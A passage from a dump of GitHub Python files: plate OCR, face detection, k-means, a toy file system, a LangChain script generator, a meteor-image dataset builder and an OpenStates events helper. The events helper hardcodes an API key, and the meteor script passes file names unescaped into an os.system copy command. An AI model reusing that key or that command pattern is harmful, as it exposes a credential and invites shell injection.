penu)\n","repo_name":"zeox09/Workspace_university","sub_path":"tipos-avanzados/desempaquetar-listas.py","file_name":"desempaquetar-listas.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28915881335","text":"\nimport os\nos.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\n\nimport imutils\nimport cv2 \nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport easyocr\n\n\nimage = cv2.imread(\"image3.jpg\")\nwidth,height,channel = image.shape\ngray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n\nfig = plt.figure(figsize=(10, 7))\n\n# setting values to rows and column variables\nrows = 2\ncolumns = 2\n\nfig.add_subplot(rows, columns, 1)\nplt.imshow(cv2.cvtColor(image,cv2.COLOR_BGR2RGB))\nplt.axis('on')\nplt.title(\"Normal\")\n\nfig.add_subplot(rows, columns, 
2)\nplt.imshow(cv2.cvtColor(gray,cv2.COLOR_BGR2RGB))\nplt.axis('on')\nplt.title("Gray-Scale")\n\n#Filter and edge detection\nfiltered = cv2.bilateralFilter(gray, 9, 75, 75)#noise reduction\nedged = cv2.Canny(filtered,30,200) #edge detection\n\nfig.add_subplot(rows, columns, 3)\nplt.imshow(cv2.cvtColor(edged,cv2.COLOR_BGR2RGB))\nplt.axis('on')\nplt.title("Edged")\n\n#Find contours\nkeypoints = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\ncontours = imutils.grab_contours(keypoints)\ncontours = sorted(contours,key=cv2.contourArea,reverse=True)[:5]\n\ncounter = 0\nlength = 0\ncX,cY,cW,cH = 0,0,0,0\ntext = ""\n\nfor contour in contours:\n    approx = cv2.approxPolyDP(contour, 10, True)\n    if len(approx) == 4:\n        x,y,w,h =cv2.boundingRect(approx)\n        cropped = gray[y:y+h,x:x+w]\n\n        #EasyOCR\n        reader = easyocr.Reader(["tr"])\n        result = reader.readtext(cropped)\n\n        if len(result) > 0 and len(result[0][1]) > length:\n            counter = counter + 1\n            length = len(result[0][1])  # keep the length of the longest recognized text\n            print(result)\n            text = result[0][1]\n            cX,cY,cW,cH = x,y,w,h\n            print(text)\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\nfontScale = float(height)/600.0\nprint(text)\nprint(len(text))\n\nif counter == 0:\n    cv2.putText(image,"Plate Not Found",(5,20),font,fontScale,(0,0,255),1,cv2.LINE_AA) \nelse:\n    cv2.rectangle(image, (cX,cY),(cX+cW,cY+cH),(0,255,0),thickness=6)\n    cv2.putText(image,text,(50,50),font,fontScale,(0,0,255),2,cv2.LINE_AA)\n\nfig.add_subplot(rows, columns, 4)\nplt.imshow(cv2.cvtColor(image,cv2.COLOR_BGR2RGB))\nplt.axis('on')\nplt.title("Result")\nplt.show()\n","repo_name":"Tahir98/NumberPlateRecognition","sub_path":"ANPR.py","file_name":"ANPR.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"71156527753","text":"from unittest import TestCase\nfrom day2 import step, Context, run_until\n\n\nclass Day2(TestCase):\n    def test_step(self):\n        c = Context(program=[1,4,5,6,1,2,0], ptr=0)\n        c2 = step(c)\n        self.assertEqual(3, c2.program[6])\n\n    def test_given(self):\n        c = Context(program=[1,0,0,0,99], ptr=0)\n        c = run_until(c)\n        self.assertEqual([2,0,0,0,99], c.program)\n\n        c = Context(program=[2,3,0,3,99], ptr=0)\n        c = run_until(c)\n        self.assertEqual([2,3,0,6,99], c.program)\n\n        c = Context(program=[2,4,4,5,99,0], ptr=0)\n        c = run_until(c)\n        self.assertEqual([2,4,4,5,99,9801], c.program)\n\n        c = Context(program=[1,1,1,4,99,5,6,0,99], ptr=0)\n        c = run_until(c)\n        self.assertEqual([30,1,1,4,2,5,6,0,99], c.program)\n","repo_name":"fbouliane/adventofcode","sub_path":"2019/test_day2.py","file_name":"test_day2.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"73944076872","text":"import math\r\nimport statistics\r\n\r\ndata=[60,61,65,63,98,99,90,95,91,96]\r\n\r\nmean = statistics.mean(data)\r\n\r\nsquares = []\r\nfor i in data:\r\n    a = (i-mean)**2\r\n    squares.append(a)\r\n\r\nsum=0\r\nfor i in squares:\r\n    sum=sum+i\r\n\r\nstdev=math.sqrt(sum/(len(data)-1))\r\nprint(stdev)\r\n\r\nprint(statistics.stdev(data))\r\n\r\n","repo_name":"DishaChhabra/Class-105","sub_path":"stdevpractice.py","file_name":"stdevpractice.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"42237382540","text":"import sys\r\nimport pandas as pd\r\nimport 
numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.spatial import distance as d\r\n\r\n\r\ndef printVals(KMap):\r\n print(\"Cluster Points\")\r\n for center in range(0, k):\r\n temp = pd.DataFrame(KMap[KMap.K == center][['x', 'y']])\r\n print(center, \" \", temp.index.values)\r\n\r\n\r\ndef calcuateSSE(k, KMap, centroids):\r\n SSElist = []\r\n for center in range(0, k):\r\n SSE = 0\r\n temp = pd.DataFrame(KMap[KMap.K == center][['x', 'y']])\r\n for index in temp.index.values:\r\n SSE += d.euclidean(temp.loc[[index]], centroids.loc[[center]]) ** 2\r\n SSElist.append(SSE)\r\n print(\"Value of Sum of Squared Error (SSE): \", sum(SSElist))\r\n\r\n\r\ndef main(k, inputpath, outputpath):\r\n # inputpath = \"C:/Users/ather/Desktop/data.csv\"\r\n # outputpath = \"C:/Users/ather/Desktop/results.txt\"\r\n data = pd.read_csv(inputpath, delimiter=\"\\t\", index_col='id')\r\n\r\n centroids = pd.DataFrame(np.random.uniform(low=0.3, high=0.9, size=(k, 2)))\r\n centroids.columns = ['x', 'y']\r\n\r\n plt.scatter(data['x'], data['y'])\r\n plt.scatter(centroids['x'], centroids['y'], marker=\"o\")\r\n for loops in range(1, 25):\r\n i = 0\r\n kloc = []\r\n temploc = 0\r\n\r\n # for points in data:\r\n for j in range(0, 100):\r\n locdist = []\r\n loc = 1\r\n for c in range(0, k):\r\n reldist = d.euclidean(data.loc[[j]], centroids.loc[[c]])\r\n locdist.append(reldist)\r\n if loc > reldist:\r\n loc = reldist\r\n temploc = i\r\n i = i + 1\r\n kloc.append(temploc)\r\n i = 0\r\n\r\n K = pd.DataFrame({'K': kloc})\r\n\r\n KMap = pd.concat([K, data], axis=1)\r\n\r\n meanlist = pd.DataFrame()\r\n\r\n for i in range(0, k):\r\n meanlist = meanlist.append(KMap[KMap.K == i][['x', 'y']].mean(0), ignore_index=True)\r\n meanlist = meanlist.fillna(0.3)\r\n if meanlist.equals(centroids):\r\n # print(loops, \"Exiting\")\r\n break\r\n centroids = meanlist\r\n\r\n printVals(KMap)\r\n calcuateSSE(k, KMap, centroids)\r\n plt.scatter(centroids['x'], centroids['y'], s=50, marker=\"x\", c='r')\r\n\r\n plt.show()\r\n\r\n\r\nk = int(sys.argv[1])\r\ninputpath = sys.argv[2]\r\noutputpath = sys.argv[3]\r\nfile = open(outputpath, \"w+\")\r\nsys.stdout = file\r\nmain(k, inputpath, outputpath)\r\nfile.close()\r\n","repo_name":"qifanyyy/JupyterNotebook","sub_path":"new_algs/Number+theoretic+algorithms/Euclidean+algorithm/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"27"} +{"seq_id":"72878523911","text":"import pandas as pd\nimport numpy as np\n\n\nfavorite_number = 4\nfavorite_color = 'green'\ndays_of_the_week = ['Sunday, Monday, Tuesday, Wednesday, Thursday, Friday, Saturday']\npatient = {'ID': 14673317, 'Name': {'First Name': 'Sean', 'Last Name': 'OSullivan'}, 'Allergies': ['Pollen', 'Peanuts']}\n\n\nprint(favorite_number)\nprint(favorite_color)\nprint(days_of_the_week)\nprint(patient)\n\n\ndef drink_legally(name, age):\n if age < 21:\n results = name + ' cannot legally drink.'\n else:\n results = name + ' can legally drink.'\n return results\n\nlegal_drink_result = drink_legally('Sean', 21)\n\nprint('Can this person drink?: ' + legal_drink_result)\n\n\n\n\n ","repo_name":"sosullivan7221/health_analytics","sub_path":"health_analysis.py","file_name":"health_analysis.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30594236710","text":"def factorial():\r\n \r\n \r\n n=int(input(\"Enter the value of 
n:\\n\"))\r\n fact=1\r\n for i in range(1,n+1):\r\n fact=fact*i\r\n print(f\"factorial of a given {n} is {fact}\")\r\n#if __name__==\"__main_\":\r\nfactorial()\r\n","repo_name":"Hari772/python_programs","sub_path":"factotial.py","file_name":"factotial.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7371924197","text":"#!/usr/bin/python3\nfrom lib.ASAI_Predict import predict_images\nimport glob\nfrom lib.PipeUtil import load_json_file,save_json_file, mfd_roi\nimport os\nimport sys\nimport cv2\n# SCRIPT TO BATCH BUILD ALL ROI FILES AND POPULATE\n# THE LEARNING REPO FOR METEORS\n\n\ndef get_mfiles(mdir):\n temp = glob.glob(mdir + \"/*.json\")\n mfiles = []\n for json_file in temp:\n if \"cloud\" not in json_file and \"import\" not in json_file and \"report\" not in json_file and \"reduced\" not in json_file and \"calparams\" not in json_file and \"manual\" not in json_file and \"starmerge\" not in json_file and \"master\" not in json_file:\n vfn = json_file.split(\"/\")[-1].replace(\".json\", \".mp4\")\n mfiles.append(vfn)\n return(mfiles)\n\ndef load_meteors_for_day(date, station_id):\n mdir = \"/mnt/ams2/meteors/\" + date + \"/\"\n msdir = \"/mnt/ams2/METEOR_SCAN/\" + date + \"/\"\n print(mdir)\n if os.path.isdir(msdir) is False:\n os.makedirs(msdir)\n mfiles = get_mfiles(mdir)\n roi_files = []\n for ff in sorted(mfiles, reverse=True):\n print(ff)\n if \"/\" in ff:\n ff = ff.split(\"/\")[-1]\n if \"\\\\\" in ff:\n ff = ff.split(\"\\\\\")[-1]\n json_file = ff.replace(\".mp4\", \".json\")\n roi_file = station_id + \"_\" + ff.replace(\".mp4\", \"-ROI.jpg\")\n stack_file = ff.replace(\".mp4\", \"-stacked.jpg\")\n mjrf = json_file.replace(\".json\", \"-reduced.json\")\n\n if os.path.exists(msdir + roi_file) is False:\n print(\"NO ROI!\", msdir + roi_file)\n if os.path.exists(mdir + mjrf):\n mjr = load_json_file(mdir + mjrf)\n if \"meteor_frame_data\" not in mjr:\n continue\n print(\"MFD:\", len(mjr['meteor_frame_data']))\n if len(mjr['meteor_frame_data']) == 0:\n continue\n\n\n x1,y1,x2,y2 = mfd_roi(mjr['meteor_frame_data'])\n img = cv2.imread(mdir + stack_file)\n print(mdir + stack_file)\n try:\n img = cv2.resize(img, (1920,1080))\n roi_img = img[y1:y2,x1:x2]\n #cv2.imshow('pepe', roi_img)\n #cv2.waitKey(30)\n cv2.imwrite(msdir + roi_file, roi_img)\n except:\n continue\n else:\n print(\"NOT REDUCED :\", mdir , mjrf)\n else:\n print(\"GOOD ROI !\", msdir + roi_file)\n if os.path.exists(msdir + roi_file) is True:\n roi_files.append(msdir + roi_file)\n learn_dir = \"/mnt/ams2/datasets/images/repo/meteors/\"\n non_met_learn_dir = \"/mnt/ams2/datasets/images/repo/nonmeteors/\"\n if os.path.isdir(learn_dir) is False:\n os.makedirs(learn_dir)\n for rf in roi_files:\n fn = rf.split(\"/\")[-1]\n learn_file = learn_dir + fn\n non_m_learn_file = non_met_learn_dir + fn\n if os.path.exists(learn_file) is True or os.path.exists(non_m_learn_file) is True:\n print(\"Learn file exists.\", learn_file)\n else:\n print(\"Learn file not found.\", learn_file)\n cmd = \"cp \" + rf + \" \" + learn_file\n print(cmd)\n os.system(cmd)\n model = \"./first_try_model.h5\"\n label = \"meteors\"\n\n predict_images(roi_files, model, label )\n #exit()\njson_conf = load_json_file(\"../conf/as6.json\")\nmdirs = glob.glob(\"/mnt/ams2/meteors/*\")\nfor md in sorted(mdirs,reverse=True):\n if os.path.isdir(md) is True:\n date = md.split(\"/\")[-1]\n load_meteors_for_day(date, 
json_conf['site']['ams_id'])\n","repo_name":"mikehankey/amscams","sub_path":"pipeline/Meteor_Repo.py","file_name":"Meteor_Repo.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"}
+{"seq_id":"72611171593","text":"#! Ran on Python 3.8.10\r\nimport math\r\n\r\n\r\nclass FileSystem:\r\n    def __init__(self):\r\n        self.file = [[] for i in range(10)]\r\n\r\n    def createFile(self, inFilename: str, readOnly: bool):\r\n        if self.file.count([]) == 0:\r\n            return -1 # ! File system is full\r\n\r\n        for i, j in enumerate(self.file):\r\n            if not j:\r\n                self.file[i] = [inFilename, readOnly, ""]\r\n                break\r\n        print(inFilename)\r\n\r\n    def deleteFile(self, inFilename: str):\r\n        begin_count = self.file.count([])\r\n\r\n        #! Remove all blocks belonging to files with this name\r\n        for i,j in enumerate(self.file):\r\n            if j:\r\n                if j[0] == inFilename:\r\n                    self.file[i] = []\r\n\r\n        end_count = self.file.count([])\r\n\r\n        #! Compare free-block counts to check whether anything was deleted\r\n        if begin_count == end_count:\r\n            return print(0) #! File does not exist\r\n\r\n        return print(1) #! File deleted successfully\r\n\r\n    def readFile(self, inFilename):\r\n\r\n        for i in self.file:\r\n            if i:\r\n                if i[0] == inFilename:\r\n                    print(i[2], end='') # ! prints the message without newline\r\n        print()\r\n\r\n    def writefile(self, inFilename, inMessage):\r\n        # ! Number of blocks needed for message\r\n        message_block = math.ceil(len(inMessage) / 10)\r\n\r\n        if [inFilename, False, ""] not in self.file:\r\n            return print(0) # ! File is read only or does not exist\r\n\r\n        index_of_head = self.file.index([inFilename, False, ""])\r\n\r\n        if self.file.count([]) + 1 - message_block < 0:\r\n            self.file[index_of_head] = []\r\n            return print(0) # ! File system is full\r\n\r\n        #! split strings into blocks of 10\r\n        string_split = [inMessage[y-10:y] for y in range(10, len(inMessage)+10, 10)]\r\n\r\n        #! insert the blocks into the file system\r\n        self.file[index_of_head][2] = string_split.pop(0)\r\n\r\n        while string_split:\r\n            empty_index = self.file.index([])\r\n            self.file[empty_index] = [inFilename, False, string_split.pop(0)]\r\n\r\n        print(1)\r\n\r\ndef main():\r\n    fs = FileSystem()\r\n    \r\n    fs.createFile("file1", False)\r\n    fs.writefile("file1", "This is the first phrase.")\r\n    \r\n    fs.createFile("file2", False)\r\n    fs.writefile("file2", "Goodbye, cruel World! I can take it no more!!")\r\n    \r\n    fs.readFile("file1")\r\n    fs.readFile("file2")\r\n    \r\n    fs.deleteFile("file1")\r\n    \r\n    fs.createFile("file3", False)\r\n    fs.writefile("file3", "No! Wait!! I'm feeling better now!")\r\n    fs.readFile("file3")\r\n    \r\n    fs.deleteFile("file2")\r\n    \r\n    fs.createFile("file4", False)\r\n    fs.writefile("file4", "Eighteen chars!!!!")\r\n    fs.readFile("file4")\r\n    \r\n    #! 
This should fail due to lack of space \r\n fs.createFile(\"file5\", False)\r\n fs.writefile(\"file5\", \"This is a very long string that is 55 characters long..\")\r\n \r\n fs.createFile(\"file6\", False)\r\n fs.writefile(\"file6\", \"We need a string with length 32.\")\r\n fs.readFile(\"file6\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Em3raud3/cs330_Operating_System","sub_path":"FileSystemTest.py","file_name":"FileSystemTest.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73077363913","text":"import os\nfrom dotenv import load_dotenv\nimport streamlit as st\nimport time\nfrom langchain.llms import OpenAI\nfrom langchain.prompts import PromptTemplate\nfrom langchain.chains import LLMChain\nfrom langchain.memory import ConversationBufferMemory\nfrom langchain.utilities import WikipediaAPIWrapper\n\nload_dotenv()\nopenai_api_key = os.environ['OPENAI_API_KEY'] \n\n# # os.environ['OPENAI_API_KEY'] = st.secrets['OPENAI_API_KEY']\n\n\nst.title('🫵🚇Youtube Video Script Generator')\nst.write(\"\")\nprompt = st.text_input('Enter a prompt for the AI to complete')\n\n\n\n#prompt template\ntitle_template = PromptTemplate(\n input_variables = ['topic'],\n template = 'write me a youtube video title about {topic}'\n)\n\nscript_template = PromptTemplate(\n input_variables = ['title', 'wikipedia_research'],\n template = 'write me a youtube video script about this title: {title} while leveraging this wikipedia research: {wikipedia_research}'\n)\n\ntitle_memory = ConversationBufferMemory(input_key='topic', memory_key='title_memory')\nscript_memory = ConversationBufferMemory(input_key='title', memory_key='script_memory')\n\n\nllm = OpenAI(temperature=0.9)\ntitle_chain = LLMChain(llm = llm, prompt = title_template, verbose=True, output_key='title', memory=title_memory)\nscript_chain = LLMChain(llm = llm, prompt = script_template, verbose=True, output_key='script', memory=script_memory)\n\nwiki = WikipediaAPIWrapper()\n\nst.sidebar.title('Script Generation Details')\n\nif prompt:\n \n title = title_chain.run(prompt)\n wiki_research = wiki.run(prompt)\n script = script_chain.run(title=title, wikipedia_research=wiki_research)\n\n progress_bar = st.progress(0)\n for i in range(100):\n time.sleep(0.01)\n progress_bar.progress(i + 1)\n\n st.write(\"\")\n st.write(\n 'Title:',\n unsafe_allow_html=True,\n )\n st.write(title)\n st.write(\"\")\n st.write(\n 'Script:',\n unsafe_allow_html=True,\n )\n st.write(script)\n st.write(\"\") \n\n with st.sidebar.expander('Wikipedia Research'):\n st.info(wiki_research)\n\n with st.sidebar.expander('Title history'):\n st.info(title_memory.buffer)\n \n with st.sidebar.expander('Script history'):\n st.info(script_memory.buffer)\n \n st.success(\"Script Generated Successfully!\")\n st.write(\"\")\n\n \n \n \n","repo_name":"collinshen123/LangChain-YT-script-generator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34987361880","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jan 24 21:00:53 2022\r\n\r\n@author: Doshite368\r\n\"\"\"\r\n\r\nn = input()\r\n\r\ncar = input().split()\r\n\r\ncnt = 0\r\n\r\nfor i in car:\r\n if n == i:\r\n cnt 
+=1\r\nprint(cnt)","repo_name":"PFSV/Baekjoon_Python","sub_path":"10797.py","file_name":"10797.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2452863769","text":"import cv2 \n\n#Load some pre-trained data on face frontals from opencv (haar cascade algorithm)\ntrained_face_data = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\n#Capture video from webcam. \nwebcam = cv2.VideoCapture(0) #VideoCapture(video path or 0 which is the default camera)\n\n# Iterate forever over frames\nwhile True:\n\n #read the current frame\n successful_frame_read, frame = webcam.read()\n\n #Must convert to grayscale\n grayscaled_img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Detect faces\n face_coordinates = trained_face_data.detectMultiScale(grayscaled_img)\n\n # Draw rectangles around the faces \n for (x, y, w, h) in face_coordinates:\n cv2.rectangle(frame, (x,y), (x+w, y + h), (0, 255, 0), 5) #rectangle(image, coordinates of the face, color, thickness of the rectangle)\n\n #shows the image in a window\n cv2.imshow(\"Face Detector\", frame)\n k = cv2.waitKey(1) & 0xff\n if k == 27:\n break\n\nwebcam.release()\n","repo_name":"sujan2003/Face-Detection-App","sub_path":"Face_Detector.py","file_name":"Face_Detector.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"14071412139","text":"\"\"\"Model performance visual evaluation\n\nThis script allows you to visually compare predictions from a model and the\nground truth by drawing the segmentation on the image. All the images of\nthe validation dataset are computed and then stored on hard drive.\n\"\"\"\n\nimport argparse\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom models import UNet\nfrom medicalDataLoader import MedicalImageDataset\nfrom utils import getTargetSegmentation\nfrom matplotlib.colors import to_rgb, TABLEAU_COLORS\nfrom scipy.ndimage import sobel\nfrom PIL import Image\nfrom pathlib import Path, PurePath\n\n# left ventricle: 3\nleft_ventricle_colour = np.asarray(to_rgb(TABLEAU_COLORS['tab:orange'])) # could be blue\n# right ventricle: 1\nright_ventricle_colour = np.asarray(to_rgb(TABLEAU_COLORS['tab:cyan'])) # could be red\n# myocardium: 2\nmyocardium_colour = np.asarray(to_rgb(TABLEAU_COLORS['tab:green'])) # could be green\n\nred = np.asarray(to_rgb(TABLEAU_COLORS['tab:red']))\npred_mask_enhancement = 1\n\n\ndef edges(mask):\n mask = np.asarray(mask)\n augmented_mask = mask * 255 # convert to black and white mask for better sobel performances\n sx = sobel(augmented_mask, axis=0, mode='constant')\n sy = sobel(augmented_mask, axis=1, mode='constant')\n sob = np.hypot(sx, sy)\n sob_max = np.max(sob)\n return (sob > (sob_max / 2.0)) & mask # not to go beyond the contours of segmentation\n\n\ndef main(weights, root_dir, model_name):\n with torch.inference_mode():\n # Load model and weights\n model = UNet(n_channels=1, n_classes=4)\n model.load_state_dict(torch.load(weights))\n model.eval()\n\n # Initialize dataset\n transformer = transforms.ToTensor()\n val_set = MedicalImageDataset('val', root_dir, transformer, transformer)\n val_loader = DataLoader(val_set, shuffle=False)\n\n # Target directory where images will be saved\n directory = Path.cwd() / 'Results/Images' / model_name / PurePath(weights).name\n directory.mkdir(parents=True, exist_ok=True)\n\n # Iterate 
over all images of the validation dataset\n for i, data in enumerate(val_loader):\n\n images, labels, img_names = data\n image = images[0, 0] # image 0, channel 0\n label = labels[0, 0]\n\n # Retrieve Ground truth and predictions from the model\n gt = getTargetSegmentation(label)\n pred = model(images)\n pred = pred.detach().numpy()\n pred = np.argmax(pred[0], axis=0)\n\n # prepare the base image for manipulations\n res = np.asarray(image) # From Tensor to ndarray\n res = np.expand_dims(res, 2) # Creating a third dimension for colours\n res = np.repeat(res, 3, axis=2) # Fill the 3 colours channels with the grey scale\n\n # Add segmentation highlights to the image\n res[pred == 1] *= right_ventricle_colour * pred_mask_enhancement\n res[pred == 2] *= myocardium_colour * pred_mask_enhancement\n res[pred == 3] *= left_ventricle_colour * pred_mask_enhancement\n res[edges(pred == 1)] = right_ventricle_colour\n res[edges(pred == 2)] = myocardium_colour\n res[edges(pred == 3)] = left_ventricle_colour\n res[edges(gt == 1)] = red\n res[edges(gt == 2)] = red\n res[edges(gt == 3)] = red\n\n # Convert from normalized image to 3-bytes pixels image\n res *= 255\n res = res.astype(np.uint8)\n\n # save the image\n filename = directory / PurePath(img_names[0]).name\n print(f'Saving {filename}...')\n im = Image.fromarray(res.astype(np.uint8), mode='RGB')\n im.save(filename)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--weights-file\", type=str)\n parser.add_argument('-d', '--root-dir', default=\"../Data/\", type=str)\n parser.add_argument('--model-name', default=\"ModelStats\", type=str)\n args = parser.parse_args()\n main(weights=args.weights_file,\n root_dir=args.root_dir,\n model_name=args.model_name)\n","repo_name":"nowtryz/SubUnet","sub_path":"Source Code/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"31524403930","text":"#!/usr/bin/env python2.7\r\n# -*- coding: utf8 -*-\r\n\r\n\"\"\"\r\nFile: events_API_helper.py\r\nAuthor: Andrew Rose\r\nDate: 4/13/2017\r\nLast Updated: 4/13/2017\r\n\r\nDescription:\r\n -This file offers helper methods for scripts that take event data from OpenStates.\r\n\r\nSource:\r\n -OpenStates API\r\n\"\"\"\r\n\r\nimport requests\r\nimport json\r\nimport datetime as dt\r\n\r\nEVENT_SEARCH_URL = \"https://openstates.org/api/v1/events/?state={0}\"\r\nEVENT_SEARCH_URL += \"&apikey=3017b0ca-3d4f-482b-9865-1c575283754a\"\r\n\r\nSTATE_METADATA_URL = \"https://openstates.org/api/v1/metadata/{0}/\"\r\nSTATE_METADATA_URL += \"?apikey=3017b0ca-3d4f-482b-9865-1c575283754a\"\r\n\r\n\r\n'''\r\nThis function builds and returns a list containing a dictionary for each event in the given state,\r\nused to fill the Hearing, CommitteeHearing, and HearingAgenda tables in our database.\r\n\r\nEach dictionary includes these fields:\r\n state: The state where the event occurs\r\n type: The type of hearing being held\r\n date_created: The date the event was posted\r\n date: The date the event occurs\r\n session_year: The session year the event occurs\r\n\r\n committees: A list of committees participating at the event.\r\n Each committee dictionary includes:\r\n house: The legislative house the committee belongs to\r\n comm: The name of the committee\r\n state: The state where the event occurs\r\n\r\n bills: A list of bills being discussed at the event.\r\n Each bill dictionary includes:\r\n bill: The ID 
number of the bill, split into:\r\n type: The bill type (e.g. HB or SB)\r\n number: The bill number\r\n state: The state where the event occurs\r\n session_year: The session year the bill was introduced\r\n'''\r\ndef get_event_list(state):\r\n api_url = EVENT_SEARCH_URL.format(state.lower())\r\n metadata_url = STATE_METADATA_URL.format(state.lower())\r\n\r\n event_json = requests.get(api_url).json()\r\n metadata = requests.get(metadata_url).json()\r\n\r\n event_list = list()\r\n for entry in event_json:\r\n event = dict()\r\n\r\n event['state'] = entry['state'].upper()\r\n if entry['type'] == 'committee:meeting':\r\n event['type'] = 'Regular'\r\n event['date_created'] = entry['created_at'].split(' ')[0]\r\n event['date'] = entry['when'].split(' ')[0]\r\n event['session_year'] = event['date'][:4]\r\n\r\n event['committees'] = list()\r\n for comm in entry['participants']:\r\n committee = dict()\r\n\r\n if comm['participant_type'] == 'committee':\r\n committee['house'] = metadata['chambers'][comm['chamber']]['name']\r\n committee['comm'] = comm['participant']\r\n committee['state'] = event['state']\r\n\r\n event['committees'].append(committee)\r\n\r\n event['bills'] = list()\r\n for bill in entry['related_bills']:\r\n bill_agenda = dict()\r\n\r\n bill = bill['bill_id'].split(' ')\r\n bill_agenda['type'] = bill[0]\r\n bill_agenda['number'] = bill[1]\r\n bill_agenda['state'] = event['state']\r\n bill_agenda['session_year'] = event['session_year']\r\n\r\n event['bills'].append(bill_agenda)\r\n\r\n event_list.append(event)\r\n\r\n return event_list\r\n","repo_name":"digitaldemocracy/dd-Data3.0","sub_path":"CurrentScripts/TX/events_API_helper.py","file_name":"events_API_helper.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71975144071","text":"def factorial(num):\n if num == 0:\n return 1\n else:\n return num * factorial(num - 1)\n\n# use a list to store the intermediate results of the recursion:\ndef factorial_li(num):\n l = [1, 1]\n for i in range(2, num+1):\n l.append(l[i-1]*i)\n return l[num]\n\nn = int(input(\"Input an integer number:\"))\nprint(factorial(n))\nprint(factorial_li(n))\n\n\n\n\n","repo_name":"Chenpeel/Codes","sub_path":"Python/basic_learn/basic_lan/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7486604095","text":"import glob\nimport os\nimport pandas as pd\n\nclass Data:\n\n def __init__(self, datapath, dayofweek):\n \"\"\"\n Initialization: where all initial conditions are listed\n :param datapath: path to the file\n :param dayofweek: lower case 3 letters for the day of the week\n \"\"\"\n self.data_path = datapath\n self.dayofweek = dayofweek\n\n def get_all_files(self):\n return glob.glob(f'{self.data_path}/*csv')\n\n def read_file(self):\n\n all_files = self.get_all_files()\n days_of_week = [i.split(\"/\")[1][0:3] for i in all_files]\n for day in days_of_week:\n if day == self.dayofweek:\n index = days_of_week.index(day)\n return pd.read_csv(all_files[index], sep = \";\", index_col=0, parse_dates=True)\n\n\n## These lines are meant to test whether the class does what it is meant to do!\ndata_path = \"data/\"\ndayofweek = \"fri\"\nobj = Data(data_path, dayofweek)\n\n# 
print(obj.read_file())\n","repo_name":"Amaranga/markov_ki-supermarket_simulation","sub_path":"read_files.py","file_name":"read_files.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30197741475","text":"\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\nimport pickle\n\nclass Akshay:\n def __init__(self, link='https://raw.githubusercontent.com/krishnaik06/FastAPI/main/BankNote_Authentication.csv'):\n self.link = link\n self.df = pd.read_csv(self.link)\n\n def split(self):\n X = self.df.drop('class', axis=1)\n y = self.df['class']\n return X, y\n\n def train_test_split(self, X, y):\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)\n return X_train, X_test, y_train, y_test\n\n def classify(self, X_train, y_train):\n classifier = RandomForestClassifier()\n classifier.fit(X_train, y_train)\n return classifier\n\n def pred(self, classifier, X_test):\n y_pred = classifier.predict(X_test)\n return y_pred\n\n def get_accuracy_score(self, y_test, y_pred):\n score = accuracy_score(y_test, y_pred)\n return score\n\n def save_model(self, classifier):\n with open('classifier.pkl', 'wb') as f:\n pickle.dump(classifier, f)\n\nif __name__ == '__main__':\n a = Akshay()\n X, y = a.split()\n X_train, X_test, y_train, y_test = a.train_test_split(X, y)\n classifier = a.classify(X_train, y_train)\n y_pred = a.pred(classifier, 